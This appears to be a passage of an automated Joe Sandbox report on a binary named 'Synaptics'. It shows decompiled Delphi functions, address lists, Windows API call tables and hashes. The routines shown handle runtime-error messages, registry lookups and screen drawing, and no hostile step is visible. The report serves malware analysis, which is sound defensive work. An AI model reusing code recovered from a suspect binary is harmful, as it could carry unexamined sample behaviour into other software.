                                                                                                                                                                                                                            0x00406b9b
                                                                                                                                                                                                                            0x00406b9d
                                                                                                                                                                                                                            0x00406ba4
                                                                                                                                                                                                                            0x00406bae
                                                                                                                                                                                                                            0x00406bb8
                                                                                                                                                                                                                            0x00406bbf
                                                                                                                                                                                                                            0x00406bd0
                                                                                                                                                                                                                            0x00406bd2
                                                                                                                                                                                                                            0x00406bd2
                                                                                                                                                                                                                            0x00406bd7
                                                                                                                                                                                                                            0x00406bdc
                                                                                                                                                                                                                            0x00406be5
                                                                                                                                                                                                                            0x00406bee
                                                                                                                                                                                                                            0x00406bfc
                                                                                                                                                                                                                            0x00406c06
                                                                                                                                                                                                                            0x00406c1a
                                                                                                                                                                                                                            0x00406c53
                                                                                                                                                                                                                            0x00406c1c
                                                                                                                                                                                                                            0x00406c2a
                                                                                                                                                                                                                            0x00406c42
                                                                                                                                                                                                                            0x00406c2c
                                                                                                                                                                                                                            0x00406c2c
                                                                                                                                                                                                                            0x00406c2c
                                                                                                                                                                                                                            0x00406c2a
                                                                                                                                                                                                                            0x00406c58
                                                                                                                                                                                                                            0x00406c5d
                                                                                                                                                                                                                            0x00406c62

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000000), ref: 00403A31
                                                                                                                                                                                                                              • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000001), ref: 00403A3D
                                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00406BF7
                                                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00406C0B
                                                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00406C1C
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00406C58
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 00406C38
                                                                                                                                                                                                                              • Part of subcall function 00406AC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                                                            • String ID: p4c
                                                                                                                                                                                                                            • API String ID: 3734044017-3290526295
                                                                                                                                                                                                                            • Opcode ID: 80c40a3011654aafb83b82008dee8090efd0972bd8c4411161df1e54b8dfc797
                                                                                                                                                                                                                            • Instruction ID: fdcee0d7d708edd62114d02ed336596d20e14c9a9bb73fcb5a3f4b26375a27c1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80c40a3011654aafb83b82008dee8090efd0972bd8c4411161df1e54b8dfc797
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52016DB4414351CAE710FFA7A8063583AA0AB2131DF05583FD541BA2F2FBBC01158B6E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004047C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E004047C0(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x49e04c == 0) {
					if( *0x49b034 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49e220 == 0xd7b2 &&  *0x49e228 > 0) {
						 *0x49e238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00404848, 2,  &_v4, 0);
				}
			}





                                                                                                                                                                                                                            0x004047c8
                                                                                                                                                                                                                            0x00404828
                                                                                                                                                                                                                            0x00404838
                                                                                                                                                                                                                            0x00404838
                                                                                                                                                                                                                            0x0040483e
                                                                                                                                                                                                                            0x004047ca
                                                                                                                                                                                                                            0x004047d3
                                                                                                                                                                                                                            0x004047e3
                                                                                                                                                                                                                            0x004047e3
                                                                                                                                                                                                                            0x004047ff
                                                                                                                                                                                                                            0x00404820
                                                                                                                                                                                                                            0x00404820

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000), ref: 004047F9
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004047FF
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 00404814
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 0040481A
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 00404838
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                            • API String ID: 1570097196-2970929446
                                                                                                                                                                                                                            • Opcode ID: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                                                            • Instruction ID: d031fbb1000275bb1cbc2334fc3dd0bc9fcf369acb127de660da951a48ee9705
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F096D564038075FE20B3626E07F5B255C8794B19F244ABFB320B50E297BC54C0865D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00448030 Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 39%
                                                                                                                                                                                                                            			E00448030(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E00447BD0(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E00429914(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E0042AD38(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E004255DC( *((intOrPtr*)(E00429EDC( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E00419804(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E00429EDC( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E00425980(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00447D0C(_t118));
						L0042C454();
						E00419804(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54))));
						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
						_t136 = E00425C68(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L004072B8();
						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
						_t137 = E00425C68(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L004072B8();
						return _t96;
					}
					_push(_a8);
					_push(E00447A20(_t142));
					E00448008(_t118, _t142);
					_push(E00447A20(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E00425C68(__ecx));
					_push(_v8);
					_t117 = E00447D0C(_t118);
					_push(_t117);
					L0042C454();
					return _t117;
				}
				return _t46;
			}




















                                                                                                                                                                                                                            0x00448030
                                                                                                                                                                                                                            0x00448039
                                                                                                                                                                                                                            0x0044803b
                                                                                                                                                                                                                            0x0044803e
                                                                                                                                                                                                                            0x00448042
                                                                                                                                                                                                                            0x00448049
                                                                                                                                                                                                                            0x0044804f
                                                                                                                                                                                                                            0x00448053
                                                                                                                                                                                                                            0x00448099
                                                                                                                                                                                                                            0x0044809d
                                                                                                                                                                                                                            0x004480ab
                                                                                                                                                                                                                            0x004480ad
                                                                                                                                                                                                                            0x004480b4
                                                                                                                                                                                                                            0x004480c0
                                                                                                                                                                                                                            0x004480c8
                                                                                                                                                                                                                            0x004480ca
                                                                                                                                                                                                                            0x004480ca
                                                                                                                                                                                                                            0x004480dd
                                                                                                                                                                                                                            0x004480f1
                                                                                                                                                                                                                            0x004480f9
                                                                                                                                                                                                                            0x004480fd
                                                                                                                                                                                                                            0x00448102
                                                                                                                                                                                                                            0x00448103
                                                                                                                                                                                                                            0x00448108
                                                                                                                                                                                                                            0x0044810a
                                                                                                                                                                                                                            0x0044810c
                                                                                                                                                                                                                            0x0044810e
                                                                                                                                                                                                                            0x00448110
                                                                                                                                                                                                                            0x00448112
                                                                                                                                                                                                                            0x00448114
                                                                                                                                                                                                                            0x00448123
                                                                                                                                                                                                                            0x00448127
                                                                                                                                                                                                                            0x0044812f
                                                                                                                                                                                                                            0x00448130
                                                                                                                                                                                                                            0x0044814c
                                                                                                                                                                                                                            0x0044815e
                                                                                                                                                                                                                            0x00448169
                                                                                                                                                                                                                            0x00448175
                                                                                                                                                                                                                            0x0044817d
                                                                                                                                                                                                                            0x00448185
                                                                                                                                                                                                                            0x0044818a
                                                                                                                                                                                                                            0x0044818f
                                                                                                                                                                                                                            0x00448191
                                                                                                                                                                                                                            0x00448196
                                                                                                                                                                                                                            0x0044819a
                                                                                                                                                                                                                            0x0044819e
                                                                                                                                                                                                                            0x004481a3
                                                                                                                                                                                                                            0x004481a7
                                                                                                                                                                                                                            0x004481a7
                                                                                                                                                                                                                            0x004481a8
                                                                                                                                                                                                                            0x004481a9
                                                                                                                                                                                                                            0x004481aa
                                                                                                                                                                                                                            0x004481b7
                                                                                                                                                                                                                            0x004481c3
                                                                                                                                                                                                                            0x004481cb
                                                                                                                                                                                                                            0x004481d3
                                                                                                                                                                                                                            0x004481d8
                                                                                                                                                                                                                            0x004481dd
                                                                                                                                                                                                                            0x004481df
                                                                                                                                                                                                                            0x004481e4
                                                                                                                                                                                                                            0x004481e8
                                                                                                                                                                                                                            0x004481ec
                                                                                                                                                                                                                            0x004481f0
                                                                                                                                                                                                                            0x004481f1
                                                                                                                                                                                                                            0x004481f4
                                                                                                                                                                                                                            0x004481f5
                                                                                                                                                                                                                            0x004481f6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004481f6
                                                                                                                                                                                                                            0x00448058
                                                                                                                                                                                                                            0x00448061
                                                                                                                                                                                                                            0x00448064
                                                                                                                                                                                                                            0x0044806e
                                                                                                                                                                                                                            0x0044806f
                                                                                                                                                                                                                            0x00448071
                                                                                                                                                                                                                            0x00448076
                                                                                                                                                                                                                            0x0044807a
                                                                                                                                                                                                                            0x00448082
                                                                                                                                                                                                                            0x00448086
                                                                                                                                                                                                                            0x00448089
                                                                                                                                                                                                                            0x0044808e
                                                                                                                                                                                                                            0x0044808f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044808f
                                                                                                                                                                                                                            0x00448201

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73752430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0044808F
                                                                                                                                                                                                                            • 73752430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448130
                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0044817D
                                                                                                                                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 00448185
                                                                                                                                                                                                                            • 73CA97E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 004481AA
                                                                                                                                                                                                                              • Part of subcall function 00448008: 73752240.COMCTL32(00000000,?,00448069,00000000,?), ref: 0044801E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 73752430Color$73752240Text
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1345666146-0
                                                                                                                                                                                                                            • Opcode ID: ab44610fbabe63d1efb5402cb7d40d97d5a42581b57647a3f1f398fe194eb632
                                                                                                                                                                                                                            • Instruction ID: f210b0e3c06df9566387ab9d1a3fb44fb9a992e98e90bafaba036239795fc9e8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab44610fbabe63d1efb5402cb7d40d97d5a42581b57647a3f1f398fe194eb632
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B510971740214AFDB40FF69DD82F9E37ACAF08714F54015AF904EB286CA78ED458B69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004751FC Relevance: 12.1, APIs: 8, Instructions: 85COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 43%
                                                                                                                                                                                                                            			E004751FC() {
				void* _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebp;
				signed int _t20;
				short _t34;
				intOrPtr* _t39;
				short* _t51;
				signed int _t52;
				short _t53;
				struct tagRECT* _t54;

				GetWindowRect(GetDesktopWindow(), _t54);
				_t39 = E00429914(1);
				 *((intOrPtr*)( *_t39 + 0x40))();
				_t20 =  *((intOrPtr*)( *_t39 + 0x34))();
				_push(0);
				L00407638();
				_t52 = _t20;
				_push(0x26);
				_push(_t52);
				L00407380();
				if((_t20 & 0x00000100) == 0x100) {
					_t51 = E0040275C(0x404);
					E004032B4(_t51, 0x404);
					 *_t51 = 0x300;
					_t34 = _t51 + 4;
					_push(_t34);
					_push(0x100);
					_push(0);
					_push(_t52);
					L004073C0();
					_t53 = _t34;
					 *((short*)(_t51 + 2)) = _t53;
					if(_t53 != 0) {
						L00407308();
						 *((intOrPtr*)( *_t39 + 0x38))(_t51);
					}
					E0040277C(_t51);
				}
				_push(0xcc0020);
				_push(0);
				_push(0);
				_push(_t52);
				_push(_v32 - _v40);
				_push(_v36 - _v44);
				_push(0);
				_push(0);
				_push(E00425C68(E00429EDC(_t39)));
				L004072B8();
				_push(_t52);
				_push(0);
				L00407888();
				return _t39;
			}


















                                                                                                                                                                                                                            0x0047520a
                                                                                                                                                                                                                            0x0047521b
                                                                                                                                                                                                                            0x00475228
                                                                                                                                                                                                                            0x00475237
                                                                                                                                                                                                                            0x0047523a
                                                                                                                                                                                                                            0x0047523c
                                                                                                                                                                                                                            0x00475241
                                                                                                                                                                                                                            0x00475243
                                                                                                                                                                                                                            0x00475245
                                                                                                                                                                                                                            0x00475246
                                                                                                                                                                                                                            0x00475255
                                                                                                                                                                                                                            0x00475261
                                                                                                                                                                                                                            0x0047526c
                                                                                                                                                                                                                            0x00475271
                                                                                                                                                                                                                            0x00475276
                                                                                                                                                                                                                            0x00475279
                                                                                                                                                                                                                            0x0047527a
                                                                                                                                                                                                                            0x0047527f
                                                                                                                                                                                                                            0x00475281
                                                                                                                                                                                                                            0x00475282
                                                                                                                                                                                                                            0x00475287
                                                                                                                                                                                                                            0x00475289
                                                                                                                                                                                                                            0x00475290
                                                                                                                                                                                                                            0x00475293
                                                                                                                                                                                                                            0x0047529e
                                                                                                                                                                                                                            0x0047529e
                                                                                                                                                                                                                            0x004752a3
                                                                                                                                                                                                                            0x004752a3
                                                                                                                                                                                                                            0x004752a8
                                                                                                                                                                                                                            0x004752ad
                                                                                                                                                                                                                            0x004752af
                                                                                                                                                                                                                            0x004752b1
                                                                                                                                                                                                                            0x004752ba
                                                                                                                                                                                                                            0x004752c3
                                                                                                                                                                                                                            0x004752c4
                                                                                                                                                                                                                            0x004752c6
                                                                                                                                                                                                                            0x004752d4
                                                                                                                                                                                                                            0x004752d5
                                                                                                                                                                                                                            0x004752da
                                                                                                                                                                                                                            0x004752db
                                                                                                                                                                                                                            0x004752dd
                                                                                                                                                                                                                            0x004752eb

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00475204
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 0047520A
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0047523C
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,00000026,00000000), ref: 00475246
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475282
                                                                                                                                                                                                                            • 73C9A8F0.GDI32(00000000,00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475293
                                                                                                                                                                                                                            • 73CA97E0.GDI32(00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752D5
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752DD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$B380DesktopRect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2454875651-0
                                                                                                                                                                                                                            • Opcode ID: b010c522aae21e05d9ca0b7fda6b020350c35e4439bfa40056778aebef1b6fa8
                                                                                                                                                                                                                            • Instruction ID: cf87fae2104b332fff4ea17414f726447bb42f5c33e6fb1eed0e3625bbc1caf8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b010c522aae21e05d9ca0b7fda6b020350c35e4439bfa40056778aebef1b6fa8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 222162317442016FD311FA79CC86F5E77989F89314F50453DFA48EB2C2CA79AC0587AA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004265A0 Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                                                                                                            			E004265A0(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E004029DC(_t24, 0x40,  &_v1032);
				_push(0);
				L00407638();
				_v8 = _t25;
				_push(_t54);
				_push(0x42669d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00407380();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L004073C0();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L004073C0();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L004073C0();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L004073C0();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L004073C0();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x4266a4);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L00407888();
				return _t29;
			}

















                                                                                                                                                                                                                            0x004265a1
                                                                                                                                                                                                                            0x004265aa
                                                                                                                                                                                                                            0x004265b3
                                                                                                                                                                                                                            0x004265c7
                                                                                                                                                                                                                            0x004265cc
                                                                                                                                                                                                                            0x004265ce
                                                                                                                                                                                                                            0x004265d3
                                                                                                                                                                                                                            0x004265d8
                                                                                                                                                                                                                            0x004265d9
                                                                                                                                                                                                                            0x004265de
                                                                                                                                                                                                                            0x004265e1
                                                                                                                                                                                                                            0x004265e4
                                                                                                                                                                                                                            0x004265e6
                                                                                                                                                                                                                            0x004265e9
                                                                                                                                                                                                                            0x004265ea
                                                                                                                                                                                                                            0x004265ef
                                                                                                                                                                                                                            0x004265f4
                                                                                                                                                                                                                            0x00426600
                                                                                                                                                                                                                            0x00426601
                                                                                                                                                                                                                            0x00426603
                                                                                                                                                                                                                            0x00426608
                                                                                                                                                                                                                            0x00426609
                                                                                                                                                                                                                            0x00426618
                                                                                                                                                                                                                            0x00426674
                                                                                                                                                                                                                            0x00426675
                                                                                                                                                                                                                            0x0042667a
                                                                                                                                                                                                                            0x0042667e
                                                                                                                                                                                                                            0x0042667f
                                                                                                                                                                                                                            0x0042661a
                                                                                                                                                                                                                            0x00426620
                                                                                                                                                                                                                            0x00426621
                                                                                                                                                                                                                            0x00426628
                                                                                                                                                                                                                            0x0042662c
                                                                                                                                                                                                                            0x0042662d
                                                                                                                                                                                                                            0x00426640
                                                                                                                                                                                                                            0x00426641
                                                                                                                                                                                                                            0x00426646
                                                                                                                                                                                                                            0x0042664a
                                                                                                                                                                                                                            0x0042664b
                                                                                                                                                                                                                            0x00426656
                                                                                                                                                                                                                            0x00426657
                                                                                                                                                                                                                            0x00426659
                                                                                                                                                                                                                            0x0042665e
                                                                                                                                                                                                                            0x0042665f
                                                                                                                                                                                                                            0x0042665f
                                                                                                                                                                                                                            0x00426618
                                                                                                                                                                                                                            0x00426686
                                                                                                                                                                                                                            0x00426689
                                                                                                                                                                                                                            0x0042668c
                                                                                                                                                                                                                            0x00426691
                                                                                                                                                                                                                            0x00426694
                                                                                                                                                                                                                            0x00426695
                                                                                                                                                                                                                            0x00426697
                                                                                                                                                                                                                            0x0042669c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 004265CE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,00000068,00000000,0042669D,?,00000000), ref: 004265EA
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 00426609
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042662D
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D), ref: 0042664B
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0042665F
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042667F
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,004266A4,0042669D,?,00000000), ref: 00426697
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
